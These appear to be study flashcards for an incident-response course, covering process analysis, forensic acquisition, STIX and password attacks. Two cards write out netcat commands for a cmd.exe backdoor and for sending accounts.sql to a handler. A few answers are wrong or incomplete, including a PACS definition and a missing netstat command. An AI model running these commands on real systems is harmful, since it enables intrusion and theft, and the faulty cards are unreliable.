Module 4: Cyber Incident Response


What are the locations used to store passwords?

- %SystemRoot%\System32\config\SAM - local users and passwords (Security Account Manager) are stored as part of the registry on Windows machines.
- %SystemRoot%\NTDS\NTDS.DIT - domain users and passwords are stored in the Active Directory database on domain controllers.
- Linux: passwords are moved to /etc/shadow, which is only readable by the root user.
- Browsers often store cached passwords, either in the Windows registry or in a file or database.

What is a horizontal brute force attack?

Also called password spraying: the attacker chooses one or more common passwords ("password" or "123456", for instance) and tries them in conjunction with multiple usernames.

What are the various factors that can affect incident severity and prioritisation?

- Data integrity
- Downtime
- Economic
- Scope
- Detection time
- Recovery time

Detecting malicious processes 2

- Examine processes hosted by service host executables (svchost.exe) and other Windows utilities (explorer.exe, notepad.exe, taskmgr.exe, iexplore.exe, and so on). Look closely at processes that do not have a valid parent / child relationship with the principal Windows processes.
- Look for processes that have used packing (compression). Packed code might have been obfuscated or encrypted. These are highlighted in purple in Process Explorer.
- Also identify how the process interacts with the network - which ports is it using? What domains or IP subnets is it contacting?

Detecting malicious processes 1

- Look for unrecognized process names, especially names that mimic a legitimate system process (scvhost, for instance) or randomly-generated names.
- Look for processes with no icon, version information, description, or company name.
- Look for processes that are unsigned (especially a process with a company name like "Microsoft Corporation" that is also unsigned).

What are some common investigation techniques?

- Viewing logs
- OS and process analysis
- Analysing prefetch files - these record the names of applications that have been run plus a wealth of other information (date and time, file path, run count, and DLLs used by the executable).

What is the file format used by EnCase to image a file?

.e01. The .e01 format allows image metadata (such as the checksum, drive geometry, and acquisition time) to be stored within the same file; if the raw format is used, a separate metadata case file will be created.

What are the three methods to manage acquisition of data?

1. Live acquisition - when performing live acquisition, isolate the host from the network by redirecting its switch port to a blackhole VLAN.
2. Shut down - shutting down the computer runs the risk that the malware will detect the shutdown process and try to remove traces of itself from volatile storage.
3. Pull the plug - switch off power to the computer suddenly. This is most likely to preserve the devices in a forensically clean state, but there is the risk of corrupting data.

What are the two principal evidence-collection questions?

1. What evidence must be collected?
2. How should the evidence be collected?

What is the magic number for a binary file?

4d 5a

What can be useful when identifying anomalies?

A configuration baseline.

What is a dropper?

A dropper is a small bit of code used to gain initial access to the system. For an attacker, obtaining sufficient permissions to execute the dropper code is usually the tricky bit. This type of file / threat signature should be detected by host IDS. The attacker will try to obfuscate the code and entry points used to launch the dropper to evade anti-malware detection.

What is a hybrid attack?

A hybrid password attack uses a combination of dictionary and brute force attacks. It is principally targeted against "naively strong" passwords, such as james1.

What is a playbook or runbook?

A playbook (or runbook) is a data-driven SOP to assist junior analysts in detecting and responding to quite specific cyber threat scenarios (phishing attempt, .RAR file data exfiltration, connection to a blacklisted IP range, and so on). The playbook starts with a SIEM report and query designed to detect the incident and identifies the key detection, containment, and eradication steps to take.

What is registry viewer?

A registry viewer can extract the Windows registry files from an image and display them on the analysis workstation, regardless of the OS. Examining the registry is important for discovering what changes malicious tools might have made to the system configuration (perhaps validating against an authorized template), discovering suspicious autostart locations and items, examining deleted keys, and so on.

OODA Loop: Act

Act - remediate the situation quickly and decisively. Then start the loop again until the incident is fully resolved: Observe, Orient, Decide, Act.

What is ADS?

Alternate data streams feature of NTFS. Can be detected using ADS Spy.

What is the purpose of an incident form?

An incident form records the detail about the reporting of an incident and assigns it a case or job number.

Network symptoms: unusual traffic spikes

An unexpected surge in traffic from Internet hosts could be a sign of an ongoing DDoS attack. DDoS attacks are very hard to counter because of the difficulty in identifying which connection attempts are legitimate and which are malicious. The key to repelling a sustained attack will lie in real-time analysis of log files to identify the pattern of suspicious traffic and redirecting that to a blackhole or sinkhole. Other approaches are to aggressively close slow connections by reducing timeouts on the affected server and make use of caching and back-end infrastructure to offload processing to other servers.

What are typical application-specific symptoms?

- Anomalous activity
- Unexpected outbound comms (check for bad IPs)
- Introduction of new accounts
- Service interruption
- Memory (buffer) overflow (process consumes bytes without releasing them again)
- Unexpected output

What tool can be used in Sysinternals to detect startup services and locations?

Autoruns

Network symptoms: Beaconing

Beaconing refers to attempts by malware to "phone home" and contact a remote Command & Control (C2) host or network. Beacon activity is detected by capturing metadata about all the sessions established or attempted and analyzing it for patterns that constitute suspicious activity.

What is the order of volatility?

1. CPU registers / cache memory
2. Routing table, ARP cache, process table, kernel stats
3. Memory (RAM)
4. Temporary file systems / swap space / virtual memory
5. Disk - including file system and free space
6. Remote logging and monitoring data
7. Physical configuration and network topology
8. Archival media

Additional point about CSRSS and WININIT

CSRSS and WININIT are run by other instances of SMSS, which terminate after loading the child process.

What are some password cracking tools?

- Cain and Abel
- John the Ripper
- THC Hydra
- Aircrack-ng
- L0phtcrack

STIX 'Campaign and threat actor'

Campaign and Threat Actor - the adversaries launching cyber-attacks are referred to in this framework as Threat Actors. The actions of Threat Actors utilizing multiple TTPs against the same target or the same TTP against multiple targets may be characterized as a campaign.

What is Cellebrite?

Cellebrite is a company focused on evidence extraction from smartphones and other mobile devices, including older feature phones, and from cloud data and metadata. The company supply Universal Forensic Extraction Devices (UFED) for use in the field.

Client Server Runtime SubSystem (csrss.exe)

Client Server Runtime SubSystem (csrss.exe) - manages low-level Windows functions. It is normal for there to be several running (so long as launched from %SystemRoot%\System32) and for them to have no parent.

STIX 'course of action'

Course of Action (CoA) - mitigating actions or use of security controls to reduce risk from Exploit Targets or to resolve an incident.

What can cryptography analysis do?

Cryptography analysis tools can be used to determine the type of encryption algorithm used and assess the strength of the encryption key (password complexity). On a live system, it might be possible to recover the decryption key from system memory.

OODA Loop: Decide

Decide - what are the options for countermeasures? What are our goals? Can we prevent a data breach from happening or should we focus on gathering forensic evidence to try to prosecute later?

What are the defensive capabilities?

- Detect
- Destroy
- Degrade
- Disrupt
- Deny
- Deceive

What is EnCase?

EnCase Forensic is a digital forensics case management product created by Guidance Software. Case management is assisted by built-in pathways, or workflow templates, showing the key steps in different types of investigation.

STIX 'exploit target'

Exploit Target - system vulnerabilities or weaknesses deriving from software faults or configuration errors.

Explorer (explorer.exe)

Explorer (explorer.exe) - this is the typical user shell (launched with the user's account privileges rather than SYSTEM's) and is likely to be the parent for processes started by the logged on user.

What is the list of file and file system viewers?

- File carving tools
- Crypto tools
- Registry viewer
- User account viewer - a user account analysis tool will report on the details of the local user accounts.
- USB viewer - a USB utility can report on devices that have been attached to the system.
- Application viewer - there are various analysis tools targeted at particular types of application, such as retrieving browser history and cookies, examining contact databases, analyzing email mailboxes, or extracting IM or VoIP call histories.

What does a file carver do?

File carving tools allow recovery of information from sectors where the file metadata has been deleted.

What are the typical channels for data exfiltration?

- HTTP or HTTPS
- Other overt channels, such as FTP, IM, P2P, email, and so on
- Explicit tunnels such as SSH or VPNs
- Steganography
- File copy to USB, external hard drive, or other media

What is Helix?

Helix from e-fense is a Linux-based Live CD designed to be mountable on a host computer without affecting the data on the host computer. The Live CD can then be used to perform evidence acquisition, such as drive imaging.

Why is incident response so difficult?

Incident response is one of the most difficult areas of security to plan for and implement because its aims are often incompatible:
- Re-establish a secure working system.
- Preserve evidence of the incident with the aim of prosecuting the perpetrators.
- Prevent reoccurrence of the incident.

What is Pass-the-Hash?

If an attacker can obtain the hash of a user password, it is possible to present the hash (without cracking it) to authenticate to network protocols such as CIFS and Kerberos. Such attacks are called Pass-the-Hash (PtH).

STIX 'incident'

Incident - a pattern of indicators forming a discrete cybersecurity event. The incident is defined both by the indicators involved and the assets affected. The incident will be assigned a ticket and priority and the parties involved in response and incident handling will be identified.

STIX 'indicator'

Indicator - a pattern of observables that are "of interest"; or worthy of cybersecurity analysis. Ideally software would automate the discovery of connections between observables, based on a knowledge of past incidents and TTPs (see below).

What should evidence bags have?

It is also appropriate to ensure that the bags have anti-static shielding to reduce the possibility that data will be damaged or corrupted on the electronic media by ElectroStatic Discharge (ESD).

System Idle Process

Kernel level binary. Will generate CPU and network traffic.

System Process

Kernel-level binary. Will generate CPU and network traffic. System is the parent for Interrupts and the Windows Session Manager SubSystem (smss.exe). SMSS is the first user-mode process and should only appear as a child of System and launch from %SystemRoot%\System32.

Local Security Authority SubSystem (lsass.exe)

Local Security Authority SubSystem (lsass.exe) - this handles authentication and authorization. There should only be a single instance, running as a child of wininit.exe.

What are typical file types associated with data staging areas used by a baddie to collect into?

Look for file archive, compression, and encryption types such as RAR or gzip that are atypical of normal end user file creation. An adversary is likely to use archives split over a number of files rather than one big file. Also look for files in system folders, such as the root of the Recycle Bin or System Volume Information.

What can you use to see whether a system policy deviates from a configuration baseline?

MS Baseline Security Analyser.

Why should you boot analysis tools from a separate OS rather than running them from within the host?

Many types of malware are able to identify process analysis tools and shut down when they detect them being launched or try to prevent the tool from being launched in the first place (though the latter approach reveals the presence of malware pretty decisively).

What are some common methods of performing code injection?

- Masquerading - the launcher replaces a genuine executable with a malicious one.
- DLL injection - the launcher forces the process to load a DLL, which can then execute malicious code.
- DLL sideloading - the launcher exploits a vulnerability in a legitimate program's manifest to load a malicious DLL at runtime.
- Process hollowing - the launcher starts a process in a suspended state and rewrites the memory locations containing the process code with the malware code.

What are two tools to obtain volatile storage data?

- Memoryze
- F-Response TACTICAL

What is the NIST definition of an 'incident'?

NIST describe an incident as "the act of violating an explicit or implied security policy".

STIX 'observable'

Observable - a stateful property of the computer system or network or an event occurring within it. Examples of observables include a change in an executable file property or signature, an HTTP request, or a firewall blocking a connection attempt. Observables would be generated by the logging and monitoring system (the data "bucket").

OODA Loop: Observe

Observe - you need information about the network and the specific incident and a means of filtering and selecting the appropriate data.

OODA Loop

Observe, Orient, Decide, Act

OODA Loop: Orient

Orient - what is the state of play? Is the attack just beginning or has the network been compromised for some time? What are the resources and goals of the adversary?

What defines the safe handling of payment card information?

Payment Card Industry Data Security Standard (PCI DSS).

What is cryptcat?

Performs a similar function to netcat, but with the ability to encrypt the channel.

What does the NIST Computer Security Incident Handling Guide identify as the stages of an incident response lifecycle?

- Preparation - making the system resilient to attack in the first place. This includes hardening systems, writing policies and procedures, and establishing confidential lines of communication. It also implies creating incident response resources and procedures.
- Detection and Analysis - determining whether an incident has taken place and assessing how severe it might be, followed by notification of the incident to stakeholders. This phase is also referred to as "Identification" in other models.
- Containment, Eradication, and Recovery - limiting the scope and magnitude of the incident. The typical response is to "pull the plug" on the affected system, but this is not always appropriate. Once the incident is contained, the cause can then be removed and the system brought back to a secure state.
- Post-incident Activity - analyzing the incident and responses to identify whether procedures or systems could be improved. It is imperative to document the incident. This phase is very commonly referred to as "Lessons Learned".

What are some of the relevant factors in containment?

- Prevent ongoing intrusion or data breach. This is likely to be the overriding priority.
- Identify whether the intrusion is the primary attack or a secondary one (part of a more complex campaign).
- Avoid alerting the attacker to the fact that the intrusion has been discovered.
- Preserve forensic evidence of the intrusion.

Process Explorer

Process Explorer is an enhanced version of Task Manager. You can view extra information about each process and understand how processes are created in parent / child relationships better. Right-click the column headers to view more or fewer fields.

What tool can be used in Sysinternals to track how a process interacts with the file system and registry?

Process Monitor

Process monitor

Process Monitor shows the events generated by Windows processes as they interact with the file system, registry, and network pipes.

What are three signs of suspicious resource consumption?

- Processor usage
- Memory consumption (especially per-process use of memory)
- Drive capacity - malware might be caching files locally for exfiltration over the network or USB.

What are the several types of data typically targeted?

- Protected Health Information (PHI)
- Personally Identifiable Information (PII)
- Payment card information
- Intellectual property
- Corporate data

RAT

Remote Access Trojan, e.g. BackOrifice, SubSeven, Poison Ivy, NJRat, XTremeRAT, KilerRAT, Blackshades, Dark Comet.

What does removal involve?

Removal - a simple option is to disconnect the host from the network completely, either by pulling the network plug or disabling its switch port. This is the least stealthy option.

How do you identify the process of buffer overflow?

Run code in a sandboxed debugging environment

Network symptoms: rogue devices 2

- Servers - an adversary may also try to set up a server as a malicious honeypot to harvest network credentials or other data. This risk can be particularly high in a virtualized environment.
- Workstations / mobile devices - end-user devices might introduce malware, perform network reconnaissance, or be used for data exfiltration. As well as digital data, you also have to consider the risk of recording from cameras and microphones.
- Smart appliances - devices such as printers, webcams, and VoIP handsets have all suffered from exploitable vulnerabilities in their firmware. If use of these assets is not tracked and monitored, they could represent a potential vector for an adversary.

Services process

Services - hosts non-boot drivers and background services. There should only be one instance of services.exe, running as a child of wininit.exe. Services either appear as child processes of services.exe or child process of svchost.exe wrappers (which should always load from %SystemRoot%\System32).

Configure netcat as a backdoor

Set up listener on victim system:
nc -l -p 666 -e cmd.exe
Set up client on host system:
nc 10.1.0.1 666

What are three examples of incident investigation software?

- Sysinternals
- Windows Forensic Toolchest
- Redline

STIX 'TTP'

Tactics, Techniques, and Procedures (TTP) - known adversary behaviors, starting with the overall goal and asset target (tactic) and elaborated over specific techniques and procedures. This information is used to identify potential indicators and incidents.

What helps to look up startup items?

The Autoruns tool in Sysinternals

What is FTK?

The Forensic Toolkit (FTK) from AccessData is another commercial investigation suite designed to run on Windows Server (or server cluster).

What is the OODA Loop intended to achieve?

The OODA loop is designed to stop you from reacting to what your adversary is doing and take the initiative with a measured response. The model is described as a loop because there is constant re-evaluation of the situation as facts change or become known.

What is Sleuth Kit?

The Sleuth Kit (sleuthkit.org) is an open source collection of command line tools and programming libraries for disk imaging and file analysis. Autopsy is a graphical frontend for these tools and also provides a case management / workflow tool.

What is a key incident response communication consideration?

The team require an "out-of-band" or "off-band" communication method that cannot be intercepted. Using corporate email or VoIP runs the risk that the adversary will be able to intercept communications. One obvious method is cellphones but these only support voice and text messaging. For file and data exchange, there should be a messaging system with end-to-end encryption such as Off-the-Record (OTR), Signal, or WhatsApp or an external email system with message encryption (S/MIME or PGP).

What is one way to discover a malware process through indirect means?

Through network communication. If you can trust netstat on the local host (better perhaps to monitor remotely) then look for evidence of the infected PID(s) communicating on the network to its handler. You can pipe the output from netstat to the findstr command to filter the results. For example, the following command searches for connections opened by PID 112120 on the 10.1.0.0 subnet:

How can pass the hash attacks be thwarted?

To defend against pass-the-hash attacks, domain admin accounts should only ever be used to log on to domain controllers. Administrative control of member servers and workstations should be performed by accounts with only the sufficient permissions required. Microsoft have also introduced a Restricted Admin mode for Windows 8 / Server 2012 up, which disables passing credentials to the remote server when accessing it over RDP.

What is a write-blocker?

To obtain a forensically sound image from non-volatile storage, you need to ensure that nothing you do alters data or metadata (properties) on the source disk or file system. A write blocker assures this process by preventing any data on the disk or volume from being changed by filtering write commands at the driver and OS level.

Which operating systems use salt?

UNIX and Linux, not Windows.

USERINIT (userinit.exe)

USERINIT (userinit.exe) - sets up the shell (typically explorer.exe) and then quits. You should only see this process briefly after logon.

WININIT (wininit.exe)

WININIT (wininit.exe) - manages drivers and services. There should only be one instance of WININIT.

WINLOGON (winlogon.exe)

WINLOGON (winlogon.exe) - manages access to the user desktop. There will be one instance for each user session. The Desktop Window Manager (dwm.exe) is likely to be a child process in modern versions of Windows.

What is STIX?

When classifying threats and understanding adversary behaviors, it is helpful to consider the framework developed by MITRE in their Structured Threat Information eXpression (STIX) white paper to facilitate sharing of threat intelligence.

Network symptoms: irregular peer-to-peer comms

When you see workstation endpoints establishing sessions with one another or with Internet hosts, there may be cause for suspicion, especially if the traffic flows include high bandwidth consumption or occur at odd times of the day.

Can Sysinternals be used for forensic analysis?

Yes.

What is the use of Sysinternals?

You can use the Sysinternals suite to try to discover signs of malware infection. To use the tools effectively, you have to build up a sense of what is "normal" in a system and spot deviations in a potentially infected system.

What is an Advanced Persistent Threat?

An APT refers to the ongoing ability of an adversary to compromise network security (to obtain and maintain access), using a variety of tools and techniques. The concept of an APT is a means of modelling "known unknown" threats. As well as scanning for virus or Trojan signatures, you can scan for the presence of Command and Control software or network activity, or look for unexplained changes in network activity overall.

During an incident, how should communications take place?

Communication should take place across secure, out-of-band channels so that an adversary is not alerted.

What is the imaging command in Linux?

dd
$ dd if=/dev/sda of=/mnt/usbstick/backup.img

Network symptoms: rogue devices 1

- Network taps - a physical device might be attached to cabling to record packets passing over that segment.
- Network appliances - rogue wireless access points, switches, or routers could be used to harvest authentication credentials and addressing information when the legitimate clients try to connect.

Use netcat to receive files

On target system:
type accounts.sql | nc 10.1.0.249 6666
On handler:
nc -l -p 6666 > accounts.sql

How can an attacker ID the right area in memory for a buffer overflow?

One of the problems the attacker faces is identifying the precise locations in memory of the return address and the address of the arbitrary code (often shellcode; a command in the machine's command shell). One of the means of doing this is a "NOP sled", so that the attacker maximizes the chances of hitting the return address by padding the input with lots of "do nothing, move to the next memory location" instructions.

How can restricting logons create a DoS?

Restricting logons can be turned into a vulnerability, as it exposes you to Denial of Service attacks. The attacker keeps trying to authenticate, locking out valid users.

What is an example of a standalone image acquisition appliance?

The CRU Ditto Forensic Field Station.

What is image acquisition?

The process of digital data acquisition for input into a PACS system.

What are the recommended specs for a digital forensics workstation?

They are recommended to be installed on enterprise-class servers or workstations (16+ CPU cores and 32 - 96 GB RAM, for instance) or on a distributed computing platform.
